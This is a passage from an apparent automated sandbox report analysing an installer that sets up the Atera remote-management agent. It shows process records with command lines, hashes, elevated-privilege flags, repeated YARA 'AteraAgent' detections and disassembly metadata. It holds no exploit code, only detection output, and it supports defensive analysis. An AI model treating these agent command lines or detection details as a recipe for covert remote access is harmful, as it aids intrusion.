                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:59
                                                                                                                                                                                                                                        Start time:12:46:39
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSI7BC1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4553718 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003B.00000002.2776825181.0000000004951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003B.00000002.2776825181.00000000049F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                                        Start time:12:46:40
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "bc07ae14-1fb3-4ad8-825a-cd1339068a47" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x2c38b3b0000
                                                                                                                                                                                                                                        File size:57'896 bytes
                                                                                                                                                                                                                                        MD5 hash:D6B7C686867602B045B64B932D752C10
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C029000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C3B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C593000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3058139148.000002C38B60B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3058139148.000002C38B62C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C44A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3058139148.000002C38B5F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C4E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C564000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C601000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C0AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3172608638.000002C3A48A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C4F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C54F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C5D5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C539000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C5EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C5A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C3A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3050301533.000000E3C794F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C50D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C5BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C086000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3058139148.000002C38B679000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3070117213.000002C38B880000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C617000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C48B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C4CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C0F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3172608638.000002C3A48BB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C3E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C475000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C063000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C05D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3172608638.000002C3A48EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3058139148.000002C38B5F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3161735582.000002C3A45B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000000.2691141024.000002C38B3B2000.00000002.00000001.01000000.00000035.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C523000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C428000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3068434031.000002C38B812000.00000002.00000001.01000000.0000004B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3058139148.000002C38B6B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C4A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C0D4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C57A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C4B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C047000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3172608638.000002C3A490C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3165784571.000002C3A4644000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38BFAF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38C111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.3072832109.000002C38BD71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                                        Start time:12:46:40
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 06F41630 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $dq$$dq
                                                                                                                                                                                                                                          • API String ID: 0-2340669324
                                                                                                                                                                                                                                          • Opcode ID: 5b982eb34e9be7487193f29281eb7d19bf51636f260da33a1d6653f13195389c
                                                                                                                                                                                                                                          • Instruction ID: e83ba8a30d4d1d8c4af81b72da627a3ca30a1a79d91e72ad7a1430a2591af23f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b982eb34e9be7487193f29281eb7d19bf51636f260da33a1d6653f13195389c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1751C031B002099FDB54EFB8D8506AFBFF6EFC9250B14812AE918DB754DA309D42C7A1
                                                                                                                                                                                                                                          Function 06F41080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: 74db699486cb1bd43e3015375db3bc4e1e2fe26457b6959e510da916afb9033b
                                                                                                                                                                                                                                          • Instruction ID: 22a44050224f91096788a3f8645c38d7d52a2c6aea0c63db6cde830e8b65f4da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74db699486cb1bd43e3015375db3bc4e1e2fe26457b6959e510da916afb9033b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6871A235F102149FDB54EBB9C85477EBAE7AFC8300F158029EA06DB7A0DE749D428791
                                                                                                                                                                                                                                          Function 06F42644 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: c08e40e2d2063c2e4fb42764fd627a3362365818f2dfd6b751f28d8f431d109e
                                                                                                                                                                                                                                          • Instruction ID: 1c7f30b0c1440ebc6be8786be4c945ae8baf79c186bb35c1ea9a669f83d6c16a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c08e40e2d2063c2e4fb42764fd627a3362365818f2dfd6b751f28d8f431d109e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1312321F193540BE7A93739682437E7F9B8FD6250F0984BAE906C7782DD688D0283A1
                                                                                                                                                                                                                                          Function 06F40C1C Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: 1384d647cfc6e23fb31668cc14766dc919ed9018256d58a3a7618b41539b2146
                                                                                                                                                                                                                                          • Instruction ID: 7348c8120cbc8578e863d2b771f4d362e4ddb1f334f6763607d224f5eefcb5c5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1384d647cfc6e23fb31668cc14766dc919ed9018256d58a3a7618b41539b2146
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5312520B192445FD799A7798C203BF7FE69BCA310F14846AE506EB7C2CE654C4583A1
                                                                                                                                                                                                                                          Function 06F42764 Relevance: .4, Instructions: 394COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 892c02c9a18d5ae2e3d8d3f2f84f9e959ec198660f102462c437e1658f7e87ba
                                                                                                                                                                                                                                          • Instruction ID: bc361936da68cbacd39f3396cb7c1d31f9eb2ee96c110598e00b25d0e1386fa9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 892c02c9a18d5ae2e3d8d3f2f84f9e959ec198660f102462c437e1658f7e87ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E0D871C0A2059F9794EFB89C026AABFF1EE5520472042BED408D3710F7328A038BD1
                                                                                                                                                                                                                                          Function 06F423B8 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 1fd44700a174fba03294e1ccc40229b1829a46e5015bba5caa065298ae9218d9
                                                                                                                                                                                                                                          • Instruction ID: e362412deef99a2698b3804b207aba001a940003bf4483a33e4327db7da004f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fd44700a174fba03294e1ccc40229b1829a46e5015bba5caa065298ae9218d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6851EC30F012118FCB50DF68D890A6ABBF4FF88344B1581A6E518DB6A2DB31DE81CB90
                                                                                                                                                                                                                                          Function 06F42268 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 306e1928d0bba4e08a6832b5335ee2469b709fc86ceb2923e20718f03fc9aa41
                                                                                                                                                                                                                                          • Instruction ID: d1d7e5c984b35a39eff3be557a71662f28685da6a7efc4f8dbf09933937a02dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 306e1928d0bba4e08a6832b5335ee2469b709fc86ceb2923e20718f03fc9aa41
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF41FA35F102149FCB54EF68D9819AEBBB6FF88710B148169E905EB364DB31DD42CB90
                                                                                                                                                                                                                                          Function 06F42A98 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a9a99f4d6a45df972d77a177a58697300ca0c79ffcc9c4cb9d7097e34fe072b7
                                                                                                                                                                                                                                          • Instruction ID: 26c22f9e9ee1f36c73ca4607ae8151f80f715de51fe4cc187f9003e51e4fc042
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9a99f4d6a45df972d77a177a58697300ca0c79ffcc9c4cb9d7097e34fe072b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A212421F193540BDBAA7A3A5C1077B7F9B9F86650F05807AFD45C7BC2DDA88E0183A1
                                                                                                                                                                                                                                          Function 06F42664 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0fef975ae90f29b0830adf72d24fbd20267177fa57a528dd0a4499e91304b151
                                                                                                                                                                                                                                          • Instruction ID: e82bab3af20eb4c6200acba90047adeb581c4a4da036d4b23e6c318a7e4d21b5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fef975ae90f29b0830adf72d24fbd20267177fa57a528dd0a4499e91304b151
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF215B32E563246FD35537656C247FB3F98CF42271F1088B7FE5887691C9248A8683E0
                                                                                                                                                                                                                                          Function 06F41050 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 723ab864311edc2ff79e0689206a0ec4520e5022fd18494b62d1a8af6813bae3
                                                                                                                                                                                                                                          • Instruction ID: 327c1f3377a5ba48beb9bc99cecdb6ad9d2784aaa32a2462b651b50fe082cd76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 723ab864311edc2ff79e0689206a0ec4520e5022fd18494b62d1a8af6813bae3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1213332F102549BDB50EB78A850AFA7FEA9FD8201F044026D506DB381EA308946C3A0
                                                                                                                                                                                                                                          Function 06F42258 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000003.1836100442.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_3_6f40000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5713c3edd123647e449bc6518ebfd7c94e3304288ca70f592626f6ba6708cb30
                                                                                                                                                                                                                                          • Instruction ID: 21d385217e9c2031e73983a3164690e5a4d9fc50da66294bed9e530b74518df0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5713c3edd123647e449bc6518ebfd7c94e3304288ca70f592626f6ba6708cb30
